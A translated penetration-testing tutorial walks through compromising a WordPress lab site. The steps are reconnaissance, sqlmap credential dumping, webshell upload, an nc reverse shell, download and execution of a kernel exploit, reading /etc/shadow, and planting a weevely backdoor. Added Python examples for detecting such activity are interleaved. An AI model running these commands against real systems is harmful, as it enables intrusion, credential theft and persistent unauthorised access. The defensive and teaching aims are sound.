From information gathering to privilege escalation (penetration testing basics summary)

Source: Internet
Author: User
Tags: website, server, domain name registration, wordpress, database



This article introduces the ideas and techniques attackers commonly use, and is suitable for beginners who are interested in network and information security. It starts with information gathering and shows how an attacker steps through your site and server. After reading it you will understand the following:






2. Use of sqlmap

3. Use of nmap

4. Reverse shell with nc

5. Privilege escalation on Linux systems

6. Use of the BackTrack 5 penetration testing tools Nikto and w3af, etc.



Suppose the attacker is going to break into your website, whose domain name is hack-test.com.



Let's use the ping command to get the IP address of the Web server.






Now we get the IP address of the Web server: 173.236.138.113



To find other sites on the same server, we use sameip.org.






Sites hosted on IP Address 173.236.138.113




There are 26 websites on 173.236.138.113. Many attackers would also look at the other websites on the same server as a way into yours, but since this is a research target we will ignore the other sites and test only your website.



We need the following additional information about your website:


    1. DNS records (A, NS, TXT, MX and SOA)
    2. Web server type (Apache, IIS, Tomcat)
    3. Registrar (the company your domain is registered with)
    4. Your name, address, email and phone number
    5. Scripting technology your site uses (PHP, ASP, ASP., JSP, CFM)
    6. Your server OS (Unix, Linux, Windows, Solaris)
    7. Ports your server exposes to the Internet (443, etc.)


Let's start by looking up your site's DNS records; we use who.is for this.






We found that your DNS records are as follows:






Let's determine the type of Web server






We discover that your web server is Apache, and then determine its version.



HACK-TEST.COM SITE INFORMATION



IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7



Next it is time to find the registration information for your domain name: your phone number, email, address and so on.






We have now obtained the registration information for your domain name, including your personal details. Next we can get the server's OS type and web server version with WhatWeb in BackTrack 5.









We find that your website runs the well-known PHP application WordPress, that the server OS is Fedora Linux, and that the web server is Apache 2.2.15. Next we look at the web server's open ports with the penetration testing tool Nmap:



1. Find the services running on the server




2. Find the server OS version




Only port 80 is open, and the operating system is Linux 2.6.22 (Fedora Core 6). We have now collected all the important information about your site, so we start scanning for vulnerabilities such as:



SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF and so on.



We will use Nikto to collect vulnerability information:



root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com




We will also use the w3af tool in BackTrack 5 R1:



root@bt:/pentest/web/w3af# ./w3af_gui






We enter the address of the website to be detected and select the Complete security audit option.






Wait a moment, and you'll see the results of the scan.






The scan shows that your site has SQL injection, XSS and other vulnerabilities. Let's examine the SQL injection.



http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220



The tool reported this URL as SQL-injectable, and we verify it with sqlmap.



Run sqlmap with -u URL






After a while, you'll see






Enter N and press Enter to continue.






We find that your site has a MySQL error-based injection and that the MySQL version is 5.0. We try to list the database names by adding the --dbs parameter.









Three databases are found. Next, the parameters "-D wordpress --tables" list all table names in the wordpress database.









Use the parameters "-T wp_users --columns" to list the columns of the wp_users table.









Next, dump the values of the user_login and user_pass columns with the parameters "-C user_login,user_pass --dump".
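From the defender's side, the w3af, Nikto and sqlmap activity above leaves a recognisable trail in the Apache access log. The following is an added example, not code from the original article: it parses constructed combined-format log lines, flags known scanner user-agents and percent-decoded query parameters carrying SQL metacharacters (the ?cat=d%27z%220 probe is one such request), and returns the source addresses involved.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format log lines (not taken from the article's server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2012:10:01:02 +0000] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/10.0"
203.0.113.5 - - [10/Mar/2012:10:01:09 +0000] "GET /Hackademic_RTB1/?cat=d%27z%220 HTTP/1.1" 500 1203 "-" "w3af.sourceforge.net"
203.0.113.5 - - [10/Mar/2012:10:02:14 +0000] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [10/Mar/2012:10:02:15 +0000] "GET /cgi-bin/test-cgi HTTP/1.1" 404 290 "-" "Mozilla/4.75 (Nikto/2.1.4)"
198.51.100.7 - - [10/Mar/2012:10:03:00 +0000] "GET /Hackademic_RTB1/?cat=3 HTTP/1.1" 200 4800 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/17.0"
"""

LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')
SCANNER_UA = re.compile(r"sqlmap|nikto|w3af", re.I)
# Quotes, comment markers and boolean/union keywords typical of error-based probes like ?cat=d'z"0
SQLI_PARAM = re.compile(r"""['"]|--|/\*|\b(and|or|union|select)\b\s+[\w'"(]""", re.I)

def analyze(log_text):
    """Return one finding per request that looks like scanner traffic or a SQL injection probe."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, ts, method, target, status, ua = m.groups()
        reasons = []
        if SCANNER_UA.search(ua):
            reasons.append("scanner user-agent: " + ua)
        # parse_qsl already percent-decodes; unquote again catches double-encoded probes
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if SQLI_PARAM.search(unquote(value)):
                reasons.append(f"SQL metacharacters in parameter {name}={value!r}")
        if reasons:
            findings.append({"ip": ip, "time": ts, "target": target,
                             "status": status, "reasons": reasons})
    return findings

def attacker_ips(findings):
    """Distinct source addresses to block or to pivot on in the rest of the log."""
    return sorted({f["ip"] for f in findings})
```

The 500 status on the quoted probe is the server-side symptom of the error-based injection sqlmap later confirms, so status codes are kept in each finding.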






We obtain the user name and password hash. We crack the hash with the following online hash-cracking site:



http://www.onlinehashcrack.com/free-hash-reverse.php






Log in to the WordPress admin back end (wp-admin).



We try to upload a PHP webshell to the server so that we can run Linux commands. Look on the Plugins page for any plugin that can be edited. We choose the Textile plugin, edit it to insert our PHP webshell, click Update File, and then browse to the webshell.









The PHP webshell is executed, and we can now control your website's files. But what we really want is root on the web server, which would give access to the other sites on it.



We use nc to get a reverse shell; first we listen on port 5555 on our own machine.






Then use the reverse-connect function of the PHP webshell: enter your IP address and port 5555.






Click Connect and we'll see









Next we try to execute some commands:



id

uid=48(apache) gid=489(apache) groups=489(apache)
(displays the user's ID and groups)

pwd

/var/www/html/hackademic_rtb1/wp-content/plugins
(displays the current directory on the server)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 GNU/Linux
(displays the kernel version)
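The id output above is the detection point for a defender: a shell or nc process running as the apache user, with httpd as its ancestor, is exactly the shape of a webshell or reverse shell. As an added example (not from the original article), this parses a constructed `ps -eo user,pid,ppid,comm` listing and reports shells or network tools descended from a web server process; the process names and PIDs are constructed.

```python
# Constructed output of `ps -eo user,pid,ppid,comm` (not captured from the article's server).
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 init
root      1203     1 httpd
apache    1210  1203 httpd
apache    1211  1203 httpd
apache    1340  1211 sh
apache    1341  1340 nc
apache    1342  1340 sh
mysql     1100     1 mysqld
root      1400     1 sshd
root      1500  1400 bash
"""

WEB_SERVERS = {"httpd", "apache2", "php-fpm", "nginx"}
SHELLS = {"sh", "bash", "dash", "nc", "ncat", "netcat", "perl", "python", "python2", "python3"}

def parse_ps(text):
    """Turn the listing into {pid: {user, ppid, comm}}; the first line is the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        user, pid, ppid, comm = line.split(None, 3)
        procs[int(pid)] = {"user": user, "ppid": int(ppid), "comm": comm}
    return procs

def ancestry(procs, pid):
    """PIDs from the process up to the root of the tree (stops when the parent is unknown)."""
    chain = []
    while pid in procs:
        chain.append(pid)
        pid = procs[pid]["ppid"]
    return chain

def suspicious_children(procs):
    """Shells and network tools whose ancestor is a web server: webshell or reverse-shell shape."""
    hits = []
    for pid, p in procs.items():
        if p["comm"] not in SHELLS:
            continue
        chain = ancestry(procs, pid)
        if any(procs[a]["comm"] in WEB_SERVERS for a in chain[1:]):
            hits.append((pid, p["user"], " <- ".join(procs[a]["comm"] for a in chain)))
    return sorted(hits)
```

The bash under sshd is left alone because an interactive login shell under sshd is normal; only web-server-descended shells are reported.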






We now know that the server's kernel version is 2.6.31.5-127.fc12.i686, so we search exploit-db.com for a vulnerability affecting this version.
After testing many exploits on the server, we use the following one to elevate privileges:
http://www.exploit-db.com/exploits/15285

We run the following command in the nc shell:
wget http://www.exploit-db.com/exploits/15285 -O roro.c
(downloads the exploit to the server and saves it as roro.c)
Note: many Linux kernel exploits are written in C, so we save it with a .c extension.
The roro.c exploit source begins as follows:
 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>

#define RECVPORT 5555
#define SENDPORT 6666

int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if (s < 0)
    {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }

    memset(&addr, 0, sizeof(addr));




The exploit is written in C, so we need to compile it into an ELF binary:

gcc roro.c -o roro

Then run the compiled exploit:

./roro










After it finishes, we enter the id command:

id

We find that we are already root:

uid=0(root) gid=0(root)







We can now view the /etc/shadow file:
cat /etc/shadow







View the /etc/passwd file:

cat /etc/passwd







We could use John the Ripper to crack every user's password, but we won't do that; instead we leave a backdoor on this server so that we can get back in at any time.



We use weevely to generate a small PHP backdoor and upload it to the server.



1. weevely usage options
root@bt:/pentest/backdoors/web/weevely# ./main.py –



2. Create a PHP backdoor with weevely, using the password koko



root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko






Then upload it to the server and connect to it:
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko







Test our hax.php back door.
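Both the plugin-editor step (editing Textile to insert a webshell) and the weevely step (dropping hax.php into wp-content/plugins) change files on disk in the plugins directory. This added example, not code from the original article or from WordPress, shows the two controls a defender would want: a hash manifest of wp-content/plugins that reveals edited or added files, and a check that wp-config.php sets DISALLOW_FILE_EDIT (a real WordPress constant that removes the built-in plugin/theme editor). The file paths and contents are constructed.

```python
import hashlib
import re

# Constructed snapshots of wp-content/plugins (relative path -> content); not files from the article's server.
BASELINE_FILES = {
    "textile/textile.php": "<?php\n/* Plugin Name: Textile */\nfunction textile_filter($t) { return $t; }\n",
    "textile/readme.txt": "Textile plugin\n",
}
CURRENT_FILES = {
    "textile/textile.php": BASELINE_FILES["textile/textile.php"]
        + "/* constructed placeholder for code appended through the plugin editor */\n",
    "textile/readme.txt": "Textile plugin\n",
    "hax.php": "<?php /* constructed placeholder for an uploaded file */ ?>\n",
}

def build_manifest(files):
    """Map each path to the SHA-256 of its content; keep the baseline copy off-host, not in the web root."""
    return {path: hashlib.sha256(content.encode()).hexdigest() for path, content in files.items()}

def diff_manifest(baseline, current):
    """List plugin files that were modified, added or removed since the baseline was taken."""
    findings = []
    for path, digest in current.items():
        if path not in baseline:
            findings.append(("added", path))
        elif baseline[path] != digest:
            findings.append(("modified", path))
    findings.extend(("removed", path) for path in baseline if path not in current)
    return sorted(findings)

def file_edit_disabled(wp_config_text):
    """True only if wp-config.php sets DISALLOW_FILE_EDIT to true, which removes the plugin/theme editor."""
    m = re.search(r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*(true|false)\s*\)",
                  wp_config_text, re.I)
    return bool(m) and m.group(1).lower() == "true"

# Constructed wp-config.php fragments: the weak default (editor left enabled) and the hardened setting.
WEAK_CONFIG = "<?php\ndefine('DB_NAME', 'wordpress');\n"
HARDENED_CONFIG = WEAK_CONFIG + "define('DISALLOW_FILE_EDIT', true);\n"
```

With the editor disabled, the Update File step in the attack is not available even to an attacker holding a cracked administrator password, and the manifest diff still catches files written by other means.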






Summary:



In this article we have walked through some of the techniques used to break into websites and servers; we hope it helps you keep your own server and website secure in the future.



